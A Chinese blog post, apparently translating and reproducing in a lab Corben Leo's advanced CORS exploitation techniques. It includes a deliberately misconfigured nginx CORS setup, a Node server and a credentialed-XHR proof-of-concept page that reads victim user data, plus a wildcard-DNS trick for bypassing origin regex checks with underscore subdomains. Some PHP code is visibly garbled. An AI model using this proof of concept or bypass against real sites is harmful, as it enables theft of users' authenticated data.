原因:cors 请求未能成功_CORS的进阶利用

最新推荐文章于 2023-06-17 11:55:31 发布
最新推荐文章于 2023-06-17 11:55:31 发布
阅读量291 收藏
点赞数
文章标签: 原因:cors 请求未能成功

3db1901afaec3aee8ea0c0af8974bead.png

简介

主要看了Corben Leo的Advanced CORS Exploitation Techniques这篇文章,对这篇文章的一个翻译吧,收获良多,复现一下cors漏洞的进阶利用。直入正题。

CORS介绍

这里就借OWASP的关于CORS的介绍。

CORS stands for Cross- Origin Resource Sharing.
Is an feature offering the possbility to:
  • A web application to expose resources to all or restricted domain,
  • A web client to made AJAX request for resource on other domain than is source domain.

This article will focus on HTTP Request Preflight feature proposed by CORS W3C specification and (mainly) how to setup a protection, on web application side, against CORS HTTP request that try to bypass the preflight process. 简单的来说,它是为了跨域资源共享,web开发者可以通过发送AJAX请求不同域下的资源。关于CORS的利用可以参考这篇文章《cors安全完全指南》。

复现环境准备

  • 靶机环境
    • nginx/1.16.0
    • PHP 5.6.40
  • 攻击机环境
    • Node/v10.9.0

受害者环境配置

受害者服务器配置CORS策略,在nginx.conf server下增加以下配置(当然你也可以直接在代码中设置):

location / {
 add_header Access-Control-Allow-Origin $http_origin;
 add_header Access-Control-Allow-Methods GET,POST,OPTIONS;
 add_header Access-Control-Allow-Credentials true;
 if ($request_method = OPTIONS) {
 add_header Access-Control-Allow-Origin $http_origin;
 add_header Access-Control-Allow-Methods GET,POST,OPTIONS;
 add_header Access-Control-Allow-Credentials true;
 add_header Access-Control-Allow-Headers DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type;
 add_header Access-Control-Max-Age 1728000;
 return 204;
 }
}

CORS的简单利用

初步测试,增加Origin头。发现返回包中出现Access-Control-Allow-Origin:[输入的origin]Access-Control-Allow-Credentials: true

攻击者需要部署一个服务端,这边使用node写了一个简单的服务端.代码如下:

Server.js

var http = require('http');
var url  = require('url');
var fs   = require('fs');
var port = 9999
​
http.createServer(function(req, res) {
    if (req.url == '/cors-poc') {
        fs.readFile('cors.html', function(err, data) {
            res.writeHead(200, {'Content-Type':'text/html'});
            res.write(data);
            res.end();
        });
    } else {
        res.writeHead(200, {'Content-Type':'text/html'});
        res.write('never gonna give you up...');
        res.end();
    }
}).listen(port, '0.0.0.0');
console.log(Serving on port ${port});

Cors.html

<!DOCTYPE html>
<html>
<head>
 <title>CORS</title>
 <script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("pwnz").innerHTML = this.responseText;
    }
  };
  xhttp.open("GET", "http://www.x1001.cn/cors.php", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script> 
 </head>
<body onload="cors();">
<center>
cors proof-of-concept:<br><br>
<textarea rows="10" cols="60" id="pwnz">
</textarea><br>
</div>

受害者应用代码示例:

<?php
setcookie('user','value');
if(isset($_COOKIE["user"]))
{header('Content-Type:text/json;charset=utf-8');
$str=array('Name'=>'x1001','Age'=>0);
$jsonencode=json_encode($str);
echo$jsonencode;}
else{echo"404";}
?>

浏览器访问http://localhost:9999/cors-poc。可以看到窃取到http://x1001.cn中用户信息。

ec54b31f7404d21a583e9fd5570a0c7a.png

但是一般的开发者都会对源进行正则匹配.防止此类攻击,如下

<?php
http_origin = '';
if (!empty($Misplaced &_SERVER['HTTP_ORIGIN']) && preg_match('/^https?://(.*.)?x1001.cn([^.-a-zA-Z0-9]+.*)?/i',$_SERVER['HTTP_ORIGIN'],$matchers)) {
$http_origin$= $matchers[0];
    header("Access-Control-Allow-Origin: {$http_origin}");
    header("Access-Control-Allow-Methods", "POST,GET");
    header('Access-Control-Allow-Credentials:true');
    header('Access-Control-Allow-Headers : X-Requested-With');
}


分析一下上面的正则表达式的作用,/^https?://(.*.)?x1001.cn主要是限制前缀为http://x1001.cn.前面的被限制死了,没有啥纠结的.我们只有从后面的正则找出破绽.

[^.-a-zA-Z0-9] 不匹配"." "-" "a-z" "A-Z" "0-9" 这些字符
+ 匹配前一个表达式一到n次
.* 匹配任意字符除去行终止符

可以看到上述限制了 . - a-z A-Z 0-9.那我们是否可以通过特殊字符绕过,当然? / # 肯定是不行的.考虑试试 下横杠 _ 等等 .

这边我当时也有很大的疑问.为什么能绕过?

我们已经知道开发者设置了正则表达式去校验Origin,那我们只要保证我们的Origin正则匹配为false就可以了,这里插一句关于Origin头的介绍.

请求首部字段 Origin 指示了请求来自于哪个站点。该字段仅指示服务器名称,并不包含任何路径信息。该首部用于CORS请求或者 POST请求。除了不包含路径信息,该字段与 Referer首部字段相似。

简单来说,攻击者访问的攻击页面(上述的Cors.html),该攻击页面会去请求用户数据.Origin就是攻击访问攻击页面的Origin.参考下图:

00142a893195a098da9afcf0d376a06d.png

现在我们的目的就是在URL中增加特殊字符也能访问攻击页面,比如我们可以构造URL:http://x10001.cn_.<your-domain>/cors-poc来绕过正则表达式,但是这个URL浏览器可以识别吗?我们先了解浏览器请求进行域名解析到获取到内容的过程。

    1. 用户通过浏览器访问URL
    2. 进行DNS查询将HOST转化成ip地址
    3. 向服务器发送SYN请求连接
    4. 服务器返回SYN+ACK
    5. 浏览器发送HTTP请求获取HTML解析

可以看到浏览器通过DNS查询得到IP(之前会查找本地host文件,不考虑),我们访问的域名是x10001.cn_.<your-domain>,就需要域名的泛解析。所谓的泛解析是指:利用通配符*(星号)来做次级域名以实现所有的次级域名均指向同一IP地址。如图:

44b9ce1656a228e6fb0865fcfc485db5.png

还有最后一个需要解决的,浏览器是否能够处理这些畸形的请求? 当然可以,我也试了一下,不同的浏览器对不同的特殊字符有不同的响应的。基于那篇文章整理出一些主流的浏览器能够处理请求的特殊字符。

    • Chrom&Firefox x1001.cn_.[your domain]/cors-poc

41f0d39fa9c71cd89bd14452e9c8d50a.png
    • Safari x1001.cn-_.[your domain]/cors-poc

bd0a898ca5afb2c2e2348474e33890a1.png

最后

要想攻击需要

  • 你需要一个域名,设置泛解析记录
  • NodeJS等等一切服务器
  • 你需要首先设置攻击者域名泛解析
  • 在你的服务器编写一个cors 攻击代码(如上面代码)
  • 浏览器访问 x1001.cn-_.<your domain>/cors-poc,获取成功。

本文仅供参考.

weixin_39616287
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebApi 跨域问题解决方案:CORS
07-23
在实际开发中,当WebApi作为一个独立的服务,例如数据服务层,而MVC项目作为前端展示层时,两者位于不同的项目和端口下,浏览器会阻止MVC对WebApi的跨域请求,导致数据无法正常获取。 为了解决这个问题,我们可以...
问题解决:跨域访问错误
dengjiayue的博客
05-09 3465
简单来说就是我在我的桌面的html文件中有访问wsl的域名,然后两个域名不一样,就会触发保护机制,如果这时你的服务端没有添加跨域的许可(对我来说就是添加桌面的html可以访问路径的许可),就会找不到路径返回404。我们可以使用一个中间件函数来处理跨域的验证,因为如果跨域,浏览器要先发送一个请求方法为: OPTIONS的请求来判断,需要返回一个200才会发送剩下的请求,使用我们定义跨域访问许可中间件函数。在相应的时候在setheader函数中添加允许跨域访问的路径(我这里嫌麻烦还是用的*)
CORS跨域请求出现问题
qq_25046827的博客
04-19 1524
1、问题描述 Access to XMLHttpRequest at ‘http://localhost:8080/user/register’ from origin ‘http://localhost:8002’ has been blocked by CORS policy: Response to preflight request doesn’t pass access control check: The value of the ‘Access-Control-Allow-Origin’ h
使用Spring Security中遇到的Preflight请求和跨域的问题
BENULL的博客
11-22 4115
前后端分离开发的项目中,使用SpringSecurity做安全框架,用JWT来实现权限管理提升RESTful Api的安全性。遇到的跨域问题,携带jwt请求过程中出现了服务端获取不到jwt情况。 对这种可能对服务器数据产生副作用的HTTP请求方法发送Preflight请求 后台用了Spring Security作为安全框架,并且没有对Preflight这个请求做出相应的处理,那么这个请求会导致权限管控失败。
原因:cors 请求成功_Cors最佳实践
weixin_39837352的博客
11-24 3651
基础知识CORS(Cross-Origin Resource Sharing),跨域资源共享,是浏览器跨域的官方解决方案。相比其他常见的跨域解决方案(jsonp、iframe、postMessage),CORS具有以下优点:前端代码优雅。CORS由浏览器和后台交互完成,前端开发者感受不到和同源通信的差别,代码完全一样;规范标准,兼容性好,IE10以上都支持,浏览器之间几乎没有差异;支持所...
跨域请求报错问题
weixin_30920513的博客
12-17 110
做接口请求的时候,有时会遇到跨域的问题,可以在请求的时候加上 header('Access-Control-Allow-Origin:*'); 转载于:https://www.cnblogs.com/songxuan/p/8052815.html
CORS算法.zip_CORS 寻优_algorithm_cors
09-24
CORS(Constrained Optimization by Random Search)算法是一种在工程优化领域广泛应用的随机搜索优化方法。它的核心思想是在解决约束优化问题时,通过随机生成的解来寻找满足约束条件的最优解。CORS算法的主要优点...
允许CORS:访问控制_-_允许来源「Allow_CORS__Access-Control-Allow-Origin」_0_1_1_0_10_18_38.zip
09-26
`Access-Control-Allow-Origin`是CORS机制中的关键头部,用于指定允许哪些源行跨域请求。 **一、CORS的基本原理** 1. **预检请求(Preflight Request)**:对于某些可能对服务器有副作用的HTTP请求方法(如PUT、...
corsica:用于处理CORS请求的Elixir库。 :beach_with_umbrella:
02-05
在Web开发中,跨域资源共享(CORS,Cross-Origin Resource Sharing)是一种机制,允许浏览器在执行JavaScript时向不同源(域名、协议或端口)的服务器发送XMLHttpRequest请求CORS确保了安全性和可控性,防止恶意...
Java利用cors实现跨域请求实例
08-30
Java利用cors实现跨域请求实例 跨域请求是指浏览器不能执行其他网站的脚本,这是由浏览器的同源策略造成的,是浏览器对JavaScript施加的安全限制。这种限制会导致Ajax请求无法跨域访问其他网站的资源。为解决这个...
nginx配置Https访问并且解决CORS请求成功
qq_33567987的博客
07-17 6191
作为一名新手小白,分享自己解决nginx配置免费https的方法,解决cors请求失败 1、安装Nginx(ubuntu) sudo apt-get install nginx 2、生成SSL证书 1.使用let’s encrypt颁发的免费SSL证书,安装软件 sudo apt-get update ...
原因:cors 请求成功_CORS - 现代网络中的跨域通信
weixin_39797264的博客
12-03 1242
假如你刚刚使用最新最好的JavaScript框架构建了一个非常酷的博客应用程序。您脚手架使用应用程序Nuxt.js,使用构建组件Vue.js和使用Vuex状态管理。在后端,您使用Node.js,FeathersJS和Express创建API 。您的后端通过API向您的前端提供博客文章数据。在将代码推送到服务器之前,您决定测试一切是否正常工作。您的Vue应用程序http://localhost:30...
CORS 请求成功_跨域请求异常解决
weixin_39872334的博客
11-22 2046
项目需要,使用前端直接调用服务端开放接口(本应该是服务端调用),由于域名不同,需要解决跨域名问题。常见的跨域解决方案:https://segmentfault.com/a/1190000011145364通过jsonp跨域• document.domain + iframe跨域• location.hash + iframe跨域•window.name + iframe跨域•postMe...
CORS请求成功
llllmc的博客
06-24 822
CORS请求失败
CORS跨域请求错误
weixin_69282348的博客
07-04 509
跨越请求错误
Firefox浏览器报错:CORS请求成功
snowflakelm的博客
08-31 6979
最近在开发中遇到个问题,项目部署完后在Google浏览器能正常使用,但是在Firefox浏览器报跨域拦截(CORS请求成功);经检查后端代码以及Nginx都已经配置了跨域相关的代码,按理不应该在出现跨域问题啊。经排查发现问题出在证书上,Firefox认为后端证书不安全从而行了拦截,好像是项目的域名与证书不一致导致。证书管理器弹窗里切到服务器部分,点击添加例外,再把需要信任的地址添加去,就可以正常访问了。由于这是浏览器的安全机制做的拦截,只要让浏览器信任该证书就行。...
请求头添加自定义属性,实现token功能时,出现CORS跨域导致请求失败( has been blocked by CORS policy: ... No ‘Access-Control-All)
piglite的专栏
06-17 2724
场景:在使用 SpringBoot + Vue 行前后端分离的开发过程中,部分功能是需要当用户登陆成功时后端(SpringBoot)向前端(Vue)返回一个token值,前端将这个token值放在以后每个请求请求头中,后端先从拦截器中验证token值的存在,再放行请求,以确保不会被别人恶意修改、删除数据,结果出现了CORS跨域导致请求失败的情况。非简单请求CORS请求,会在正式通信之前,增加一次HTTP查询请求,称为 “预检” 请求(preflight)。由于在后端拦截器中拦截了所有的请求
原因:cors 请求成功_CORS跨域漏洞学习
weixin_39963174的博客
12-01 2415
简介网站如果存CORS跨域漏洞就会有用户敏感数据被窃取的风险。跨域资源共享(CORS)是一种浏览器机制,可实现对位于给定域外部的资源的受控访问。它扩展了同源策略(SOP)并增加了灵活性。但是,如果网站的CORS策略配置和实施不当,它也可能带来基于跨域的攻击。CORS并不是针对跨域攻击(例如跨站点请求伪造(CSRF))的保护措施。同源策略这里我们必须要了解一下同源策略:同源策略是一种限制性...
已拦截跨源请求:同源策略禁止读取位于 的远程资源。(原因CORS 请求成功)。
最新发布
07-12
另外,还可以设置其他的 CORS 相关的响应头,如 Access-Control-Allow-Methods(允许的请求方法)、Access-Control-Allow-Headers(允许的请求头)等,具体的设置根据你的需求而定。 需要注意的是,这些设置应该在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值